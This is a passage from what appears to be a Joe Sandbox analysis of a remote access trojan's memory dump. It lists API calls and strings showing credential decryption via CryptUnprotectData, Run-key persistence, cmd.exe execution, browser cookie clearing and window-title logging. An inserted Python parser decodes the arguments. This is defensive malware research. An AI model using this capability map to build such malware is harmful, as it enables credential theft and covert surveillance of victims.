                        • Instruction Fuzzy Hash: A8110671904385AAC720A7778C0DEAB7FA8DBD2710F04046FF54163291DAB89445CBBA
                        APIs
                        • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 00406A82
                        • GetProcAddress.KERNEL32(00000000), ref: 00406A89
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID: CryptUnprotectData$crypt32
                        • API String ID: 2574300362-2380590389
                        • Opcode ID: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                        • Instruction ID: d796ed41fc96dc9ef8d801536240fab0e9422483ab40f89d2a564a4d0f07de08
                        • Opcode Fuzzy Hash: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                        • Instruction Fuzzy Hash: 6201B535B00216ABCB18DFAD9D449ABBBB8EB49300F14817EE95AE3341D674D9008BA4
                        APIs
                        • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,10558B1C,10558B1C,PkGNG,0044C302,FF8BC369,00000000,00000002,00000000,PkGNG), ref: 0044C28C
                        • GetLastError.KERNEL32 ref: 0044C296
                        • __dosmaperr.LIBCMT ref: 0044C29D
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorFileLastPointer__dosmaperr
                        • String ID: PkGNG
                        • API String ID: 2336955059-263838557
                        • Opcode ID: 60eaf30ffa5a6b77e16cdf42a69bcf8f7fa5cf007f91ab5b57ca5c6e56bd7837
                        • Instruction ID: 03228b3a5a263cac3d3762c0c6cb9bea0ee6cefe7ee70a3785aa569069518732
                        • Opcode Fuzzy Hash: 60eaf30ffa5a6b77e16cdf42a69bcf8f7fa5cf007f91ab5b57ca5c6e56bd7837
                        • Instruction Fuzzy Hash: 9E016D32A11104BBDF008FE9CC4089E3719FB86320B28039AF810A7290EAB5DC118B64
                        APIs
                        • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                        • CloseHandle.KERNEL32(?), ref: 004051CA
                        • SetEvent.KERNEL32(?), ref: 004051D9
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseEventHandleObjectSingleWait
                        • String ID: Connection Timeout
                        • API String ID: 2055531096-499159329
                        • Opcode ID: 16c0c5432ea764d1c3b3677813c316a5f50629e206d56325c82df1a06a1f960a
                        • Instruction ID: e4880b57ed2806ada623013920947221b56867654f576af2420d72dde76e11cf
                        • Opcode Fuzzy Hash: 16c0c5432ea764d1c3b3677813c316a5f50629e206d56325c82df1a06a1f960a
                        • Instruction Fuzzy Hash: 1201D831A40F40AFE7257B368D9552BBBE0FF01302704097FE68396AE2D6789800CF59
                        APIs
                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E833
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Exception@8Throw
                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                        • API String ID: 2005118841-1866435925
                        • Opcode ID: 8dcc56bc0b3abd67e197b42ddab56c72444c781ea05e0f6efff8352e2a22a648
                        • Instruction ID: aca7d9cae529c24a85643cb8f0975e7fdd15ab88b82278639a3f13e82648cb6f
                        • Opcode Fuzzy Hash: 8dcc56bc0b3abd67e197b42ddab56c72444c781ea05e0f6efff8352e2a22a648
                        • Instruction Fuzzy Hash: 2C01B1315443086AE618F693C843FAA73585B10708F108C2FAA15761C2F67D6961C66B
                        APIs
                        • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,00474EF8,00474EF8,PkGNG,00404A40), ref: 0041CB09
                        • LocalFree.KERNEL32(?,?), ref: 0041CB2F
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: FormatFreeLocalMessage
                        • String ID: @J@$PkGNG
                        • API String ID: 1427518018-1416487119
                        • Opcode ID: 582a0a935ffae84e33b405a2c8e80a835bcb557197e1ba62297b84e69e8a9d31
                        • Instruction ID: 02a9d8e2c753fe243ccbc909122ce1ddd8f8b45a09ed5088e6b723b988b0f700
                        • Opcode Fuzzy Hash: 582a0a935ffae84e33b405a2c8e80a835bcb557197e1ba62297b84e69e8a9d31
                        • Instruction Fuzzy Hash: 5EF0A434B0021AAADF08A7A6DD4ADFF7769DB84305B10007FB606B21D1EEB86D05D659
                        APIs
                        • RegCreateKeyW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?), ref: 0041381F
                        • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,?,?,?,?,00000000,004752D8,762337E0,?), ref: 0041384D
                        • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,004752D8,762337E0,?,?,?,?,?,0040CFAA,?,00000000), ref: 00413858
                        Strings
                        • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0041381D
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseCreateValue
                        • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                        • API String ID: 1818849710-1051519024
                        • Opcode ID: 3da2de30dd2e4c2ff773a1c969aacac889c14d245fa7b83563a43fe4ea506f1b
                        • Instruction ID: 91b44a8789fefabe47d0aed0b401f4e945a8dec35bb1902c17c37083bf943f80
                        • Opcode Fuzzy Hash: 3da2de30dd2e4c2ff773a1c969aacac889c14d245fa7b83563a43fe4ea506f1b
                        • Instruction Fuzzy Hash: 83F0C271440218FBDF10AFA1EC45FEE376CEF00B56F10452AF905A61A1E7359F04DA94
                        APIs
                        • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFB1
                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040DFF0
                          • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 0043565F
                          • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 00435683
                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E016
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                        • String ID: bad locale name
                        • API String ID: 3628047217-1405518554
                        • Opcode ID: 03a3a1b6538e95a80bbc96a5a3230d3fb174e533ca0510e3d942a7448ac3be7a
                        • Instruction ID: c9d4814c50014869750c7e26a4e1a69426a580a77e14145940ab7c7d7e24a8db
                        • Opcode Fuzzy Hash: 03a3a1b6538e95a80bbc96a5a3230d3fb174e533ca0510e3d942a7448ac3be7a
                        • Instruction Fuzzy Hash: EAF081314006049AC634FA62D863B9AB7B89F14718F504A7FB906228D1EF7CBA1CCA4C
                        APIs
                        • RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046611C), ref: 0041377E
                        • RegSetValueExA.ADVAPI32(0046611C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000), ref: 004137A6
                        • RegCloseKey.ADVAPI32(0046611C,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000,?,0040875D,00000001), ref: 004137B1
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseCreateValue
                        • String ID: Control Panel\Desktop
                        • API String ID: 1818849710-27424756
                        • Opcode ID: 6030d9855dac89f4cd46f7f8c789974497344dcf9873e73d86c3d4cdefa30cde
                        • Instruction ID: c04290829ccef693e4e8b5b7d06cdf9a2950efbbd707a4c1379ff92f90edcb59
                        • Opcode Fuzzy Hash: 6030d9855dac89f4cd46f7f8c789974497344dcf9873e73d86c3d4cdefa30cde
                        • Instruction Fuzzy Hash: B8F06272400118FBCB009FA1DD45DEA376CEF04B51F108566FD09A61A1D7359E14DB54
                        APIs
                        • CreateThread.KERNEL32(00000000,00000000,Function_0001D45D,00000000,00000000,00000000), ref: 00416C47
                        • ShowWindow.USER32(00000009), ref: 00416C61
                        • SetForegroundWindow.USER32 ref: 00416C6D
                          • Part of subcall function 0041CD9B: AllocConsole.KERNEL32(00475338), ref: 0041CDA4
                          • Part of subcall function 0041CD9B: ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                          • Part of subcall function 0041CD9B: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Window$ConsoleShow$AllocCreateForegroundOutputThread
                        • String ID: !D@
                        • API String ID: 3446828153-604454484
                        • Opcode ID: 6979cefb1d1fefa54efaa96eb459276fcc124e6eae3c34ad0f1a5970b9474eaa
                        • Instruction ID: c1d0571eb829819ca76672189d51ce116019f2d3a91c4b5ec781e9fa27a10d2f
                        • Opcode Fuzzy Hash: 6979cefb1d1fefa54efaa96eb459276fcc124e6eae3c34ad0f1a5970b9474eaa
                        • Instruction Fuzzy Hash: 9EF05E70158201EAD720AB62EC45AFA7B69EB54351F00483BF849D14F2DB398C85C69D
                        APIs
                        • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00416130
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExecuteShell
                        • String ID: /C $cmd.exe$open
                        • API String ID: 587946157-3896048727
                        • Opcode ID: 1fb54d341f42364606467e993f20cb3c4ceaa424224daa94047b07daa39982c0
                        • Instruction ID: 0a18f3537a1213b4b5dca9b82f73c842755a7e35c30cee8a650de64661b344da
                        • Opcode Fuzzy Hash: 1fb54d341f42364606467e993f20cb3c4ceaa424224daa94047b07daa39982c0
                        • Instruction Fuzzy Hash: 0DE0C0B0208345AAC705E775CC95CBF73ADAA94749B50483F7142A20E2EF7C9D49C659
                        APIs
                        • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014B9
                        • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID: GetLastInputInfo$User32.dll
                        • API String ID: 2574300362-1519888992
                        • Opcode ID: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
                        • Instruction ID: ea73ef4d1088e939c140d9431744cb36a9dcab52d5ea7f3e4bb33043e5d41cbe
                        • Opcode Fuzzy Hash: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
                        • Instruction Fuzzy Hash: 5EB092B45C1700FBCB106FA4AC4E9293AA9A614703B1088ABB845D2162EBB884008F9F
                        APIs
                        Strings
                        • [Cleared browsers logins and cookies.], xrefs: 0040C0E4
                        • Cleared browsers logins and cookies., xrefs: 0040C0F5
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Sleep
                        • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                        • API String ID: 3472027048-1236744412
                        • Opcode ID: 24f20f3b92deb628025467620478f708c177420abe32db4e4f6f8a7850cc6954
                        • Instruction ID: fac43f66edf0589ccdcbb227709f1a337e776f7542e83b73a027453bfa593f46
                        • Opcode Fuzzy Hash: 24f20f3b92deb628025467620478f708c177420abe32db4e4f6f8a7850cc6954
                        • Instruction Fuzzy Hash: 2531C804348380E9D6116BF554567AB7B814E93744F08457FB9C42B3D3D97E4848C7AF
                        APIs
                          • Part of subcall function 0041C551: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041C561
                          • Part of subcall function 0041C551: GetWindowTextLengthW.USER32(00000000), ref: 0041C56A
                          • Part of subcall function 0041C551: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041C594
                        • Sleep.KERNEL32(000001F4), ref: 0040A573
                        • Sleep.KERNEL32(00000064), ref: 0040A5FD
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Window$SleepText$ForegroundLength
                        • String ID: [ $ ]
                        • API String ID: 3309952895-93608704
                        • Opcode ID: 4603c95d7a0278816d05f17b1e103e1b56ebf32c1baad14edcc254fcbbfd146b
                        • Instruction ID: 97bd403738d1ca0cb59e80c1fc79ee6201ed0cb329172f4776a94889a39aca56
                        • Opcode Fuzzy Hash: 4603c95d7a0278816d05f17b1e103e1b56ebf32c1baad14edcc254fcbbfd146b
                        • Instruction Fuzzy Hash: FE119F315043006BC614BB65CC5399F77A8AF50308F40053FF552665E2FF79AA5886DB
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
                        • Instruction ID: 17f232e73e96fb976a24982deb7d35e81c220cd9520ca4ef7e8dcf180de91df6
                        • Opcode Fuzzy Hash: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
                        • Instruction Fuzzy Hash: 1301F2B36497067EFA202E786CC1F67220CDF41BBEB34032BB574712D1DA68CE404568
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
                        • Instruction ID: 34d970f17befced98e3ca294e9c9a609e5e7bfbb0444a55afbb34e25ce639c56
                        • Opcode Fuzzy Hash: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
                        • Instruction Fuzzy Hash: 0601A2B26096117EFA111E796CC4E27624CDB81BBF325032BF535612D6DA688E014169
                        APIs
                        • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                        • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C4B2
                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C4D7
                        • CloseHandle.KERNEL32(00000000,?,00000000,0040412F,00465E74), ref: 0041C4E5
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$CloseCreateHandleReadSize
                        • String ID:
                        • API String ID: 3919263394-0
                        • Opcode ID: c4d28c244904a0c4b31f6914b30dbe9704a3e03414ae878e480ac2c22075bc56
                        • Instruction ID: d938e931a51b81dfe9e25773ede9364464a286a3a3b97e7b856b7b87d8bf29b3
                        • Opcode Fuzzy Hash: c4d28c244904a0c4b31f6914b30dbe9704a3e03414ae878e480ac2c22075bc56
                        • Instruction Fuzzy Hash: 0FF0C2B1245308BFE6101B25ACD4EBB375CEB867A9F00053EF902A22C1CA298C05913A
                        APIs
                        • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                        • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                        • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C233
                        • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C23B
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseHandleOpenProcess
                        • String ID:
                        • API String ID: 39102293-0
                        • Opcode ID: f9441541d1e055ebec971b28555d0febc4d5c2f8e157a993c91f5ce795852cd2
                        • Instruction ID: 502f13a9e38f74389cb09c542eced9ec4ef47df168bad581006c654e14f0d55b
                        • Opcode Fuzzy Hash: f9441541d1e055ebec971b28555d0febc4d5c2f8e157a993c91f5ce795852cd2
                        • Instruction Fuzzy Hash: 53012BB1680315ABD61057D49C89FB7B27CDB84796F0000A7FA04D21D2EF748C818679
                        APIs
                        • ___BuildCatchObject.LIBVCRUNTIME ref: 0043987A
                          • Part of subcall function 00439EB2: ___AdjustPointer.LIBCMT ref: 00439EFC
                        • _UnwindNestedFrames.LIBCMT ref: 00439891
                        • ___FrameUnwindToState.LIBVCRUNTIME ref: 004398A3
                        • CallCatchBlock.LIBVCRUNTIME ref: 004398C7
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                        • String ID:
                        • API String ID: 2633735394-0
                        • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                        • Instruction ID: dcee73c62e3621a690853eebe59cad03ae51e1002f288686f44977c5109bb855
                        • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                        • Instruction Fuzzy Hash: 18011732000109BBCF12AF55CC01EDA3BBAEF9D754F04511AFD5861221C3BAE861DBA5
                        APIs
                        • GetSystemMetrics.USER32(0000004C), ref: 004193F0
                        • GetSystemMetrics.USER32(0000004D), ref: 004193F6
                        • GetSystemMetrics.USER32(0000004E), ref: 004193FC
                        • GetSystemMetrics.USER32(0000004F), ref: 00419402
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: MetricsSystem
                        • String ID:
                        • API String ID: 4116985748-0
                        • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                        • Instruction ID: 9a44d86f369c7068fc2c949f9b02ed5542bf43da40f6b7222f807aea32733f55
                        • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                        • Instruction Fuzzy Hash: DFF0A471B043155BD744EA759C51A6F6BD5EBD4264F10043FF20887281EE78DC468785
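The records above list each function's Win32 calls with their stack arguments as raw hex, which is exactly what tells an analyst what a Remcos routine does: `CreateFileW` with `80000000`/`00000003` is a read-only open of an existing file, `OpenProcess` with `00001000` and `00000400` asks for query rights rather than injection rights, and `GetSystemMetrics` with `4C`..`4F` reads the virtual-screen rectangle that a screenshot routine needs. The following parser is an added example for this page, not Joe Sandbox or Remcos code: it takes API lines in the format printed above (copied verbatim as constructed input) and decodes the constant arguments using documented Win32 values. It assumes Joe Sandbox's layout of `Api.MODULE(args), ref: ADDR`, with `?` standing for an unresolved argument.

```python
"""Parse the per-function "APIs" lines of a Joe Sandbox report and decode the
constant arguments that reveal what the Remcos function is doing.

Added example for this page, not Joe Sandbox or Remcos code. Sample lines are
copied from the records above; constant tables are documented Win32 values.
Assumption: arguments are 8-digit hex as Joe Sandbox prints them, '?' = unknown.
"""
import re
from dataclasses import dataclass, field

# Constructed input: API lines copied from the CreateFileW, OpenProcess,
# GetSystemMetrics, GetKeyState and Sleep records on this page.
SAMPLE_API_LINES = """
• CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
• OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
• OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
• GetSystemMetrics.USER32(0000004C), ref: 004193F0
• GetSystemMetrics.USER32(0000004F), ref: 00419402
• GetKeyState.USER32(00000011), ref: 0040B64B
• Sleep.KERNEL32 ref: 00416640
"""

# Api.MODULE(args), ref: ADDR -- the argument list is optional (see Sleep above).
LINE_RE = re.compile(r"(\w+)\.(\w+)(?:\(([^)]*)\))?,?\s*ref:\s*([0-9A-Fa-f]{8})")
HEX_RE = re.compile(r"^[0-9A-Fa-f]{8}$")

# Documented Win32 constants used by the decoders below.
PROCESS_ACCESS = {0x0001: "PROCESS_TERMINATE", 0x0002: "PROCESS_CREATE_THREAD",
                  0x0008: "PROCESS_VM_OPERATION", 0x0010: "PROCESS_VM_READ",
                  0x0020: "PROCESS_VM_WRITE", 0x0400: "PROCESS_QUERY_INFORMATION",
                  0x1000: "PROCESS_QUERY_LIMITED_INFORMATION"}
GENERIC_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE"}
CREATE_DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                      4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
SYSTEM_METRICS = {0x4C: "SM_XVIRTUALSCREEN", 0x4D: "SM_YVIRTUALSCREEN",
                  0x4E: "SM_CXVIRTUALSCREEN", 0x4F: "SM_CYVIRTUALSCREEN"}
VIRTUAL_KEYS = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU"}


@dataclass
class ApiCall:
    api: str
    module: str
    args: list           # int for hex args, None for '?', str for literal strings
    ref: int             # call-site address printed after "ref:"
    notes: list = field(default_factory=list)


def _parse_arg(raw):
    raw = raw.strip()
    if raw == "?":
        return None
    return int(raw, 16) if HEX_RE.match(raw) else raw


def parse_api_lines(text):
    """Turn report lines into ApiCall records; lines without 'ref:' are ignored."""
    calls = []
    for m in LINE_RE.finditer(text):
        api, module, raw_args, ref = m.groups()
        args = [_parse_arg(a) for a in raw_args.split(",")] if raw_args else []
        calls.append(ApiCall(api, module, args, int(ref, 16)))
    return calls


def _flags(value, table):
    return [name for bit, name in table.items() if value & bit]


def decode(call):
    """Attach human-readable meanings for the constant arguments we understand."""
    a = call.args
    if call.api == "OpenProcess" and a and isinstance(a[0], int):
        call.notes = _flags(a[0], PROCESS_ACCESS) or [f"access=0x{a[0]:x}"]
    elif call.api == "GetSystemMetrics" and a and isinstance(a[0], int):
        call.notes = [SYSTEM_METRICS.get(a[0], f"index={a[0]}")]
    elif call.api == "GetKeyState" and a and isinstance(a[0], int):
        call.notes = [VIRTUAL_KEYS.get(a[0], f"vk=0x{a[0]:x}")]
    elif call.api == "CreateFileW" and len(a) >= 5 and isinstance(a[1], int):
        # args: lpFileName, dwDesiredAccess, dwShareMode, lpSecurityAttributes,
        # dwCreationDisposition, ... (Joe Sandbox also prints stack beyond them)
        call.notes = _flags(a[1], GENERIC_ACCESS) + [
            CREATE_DISPOSITION.get(a[4], f"disposition={a[4]}")]
    return call


def summarize(calls):
    """Map each API name to the sorted set of decoded meanings seen for it."""
    out = {}
    for c in calls:
        out.setdefault(c.api, set()).update(decode(c).notes)
    return {api: sorted(notes) for api, notes in out.items()}


if __name__ == "__main__":
    for api, notes in summarize(parse_api_lines(SAMPLE_API_LINES)).items():
        print(f"{api:18} {', '.join(notes) or '-'}")
```

Run against the full report text, the summary gives a quick capability view per function: the `OpenProcess` rights here are enough for process enumeration but not for injection, so the injection Joe Sandbox flagged happens elsewhere in the sample, and the four virtual-screen metrics together mark the screenshot path.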
                        APIs
                        • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438F31
                        • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438F36
                        • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438F3B
                          • Part of subcall function 0043A43A: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A44B
                        • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438F50
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                        • String ID:
                        • API String ID: 1761009282-0
                        • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                        • Instruction ID: 04dbcd9d80b8837b95b31ffc0e846904d80335f120ca5f78e3accc67d081205e
                        • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                        • Instruction Fuzzy Hash: 59C04C15080781541C50B6B2210B2AE83461E7E38DFD074DFFCE0571038E4E043B653F
                        APIs
                        • WideCharToMultiByte.KERNEL32(000000FF,00000000,00000006,00000001,?,?,00000000,?,00000000,?,?,00000000,00000006,?,?,?), ref: 00449F0F
                        • GetLastError.KERNEL32 ref: 00449F2B
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharErrorLastMultiWide
                        • String ID: PkGNG
                        • API String ID: 203985260-263838557
                        • Opcode ID: 8762d6c9eb8cd6bb849928aa97b0b7335ecf1b8cbe6ccd937ce160abea437523
                        • Instruction ID: 5218313022fb824330162c1b3e1e252a07855a0508c927524b2412b0d5c8e50b
                        • Opcode Fuzzy Hash: 8762d6c9eb8cd6bb849928aa97b0b7335ecf1b8cbe6ccd937ce160abea437523
                        • Instruction Fuzzy Hash: A531F831600205EBEB21EF56C845BAB77A8DF55711F24416BF9048B3D1DB38CD41E7A9
                        APIs
                          • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                        • __Init_thread_footer.LIBCMT ref: 0040B797
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
